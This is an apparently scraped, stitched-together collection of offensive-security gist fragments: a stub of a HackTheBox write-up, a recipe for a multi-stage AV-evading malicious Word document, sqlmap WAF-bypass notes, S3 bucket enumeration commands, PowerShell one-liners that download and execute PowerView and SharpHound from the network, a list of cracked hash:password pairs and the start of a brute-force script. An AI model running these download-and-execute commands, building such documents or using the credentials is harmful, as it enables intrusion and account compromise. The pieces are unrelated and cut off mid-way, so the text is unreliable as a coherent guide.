Never Mind secfb

Windows Toolkit

Binary

Native Binaries

IDA Pro

IDA Plugins	Preferred	Neutral	Unreviewed

This gist has been DEPRECATED.

The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/Optimum-HTB.html

Updates will be reflected on GITPAGE VERSIONS ONLY

CTF Writeup: Optimum on HackTheBox

30 October 2017

Introduction

This was one of my first capture the flags, and the first HTB to go retired while I had a good enough grasp of it to do a write up. The steps are directed towards beginners, just like the box.

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

using OLE event autorun method
removing it's pretext shapes
Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
Leveraging certutil technique to receive Base64 encoded malicious HTA document
Having Base64 encoded Powershell command in that Author property

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

How to pass the OSCP

Recon
Find vuln
Exploit
Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.


	Ffuf (faster):
	ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v


	Wfuzz:
	wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50

	The files:

	# Domain Recon
	## ShareFinder - Look for shares on network and check access under current user context & Log to file
	powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess\|Out-File -FilePath sharefinder.txt"

	## Import PowerView Module
	powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

	## Invoke-BloodHound for domain recon
	powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

	41b5f9baa448533dfd513f4ed1753990f59cc613:workingknowledge
	deb7be5e7ca96c5b317b8a0ee13045a00e22bab5:rafaebiel
	c528cf77d9cdb4ea14b43aa62cf55044e25d3b4e:kunsitint
	0cbcf09868e2ec6b856eee76e7e6a9201cc60ed0:zxcasdQWE!@#
	413b6507e26f3fbe388f4f5bc1f5599ff85dec1c:siapatakut
	708c503230bb9a2079696386f891899a7fc15ba5:FM95jd01
	400945c2ea0fa0179adb232c882fd9d8dec90424:100Senh@
	e7880b9ae185f66fdfcc80d71e61154ce705f4ab:om2sanji
	d819838e7f3a3d37fdc8dcb5c5cf9409d32bfbaf:bc89mod47a
	12ba813567f950658c0151e9b4d2e3dcdccc8d25:fredandleo

	#!/bin/bash

	HOST="$1"
	USERS="$2"
	PASSWORDS="$3"
	SLEEP="$4"

	EMAIL="[email protected]"
	TEXT="[email protected]"

	#!/bin/bash

	BLACK="\033[30m"
	RED="\033[31m"
	GREEN="\033[32m"
	YELLOW="\033[33m"
	BLUE="\033[34m"
	PINK="\033[35m"
	CYAN="\033[36m"
	WHITE="\033[37m"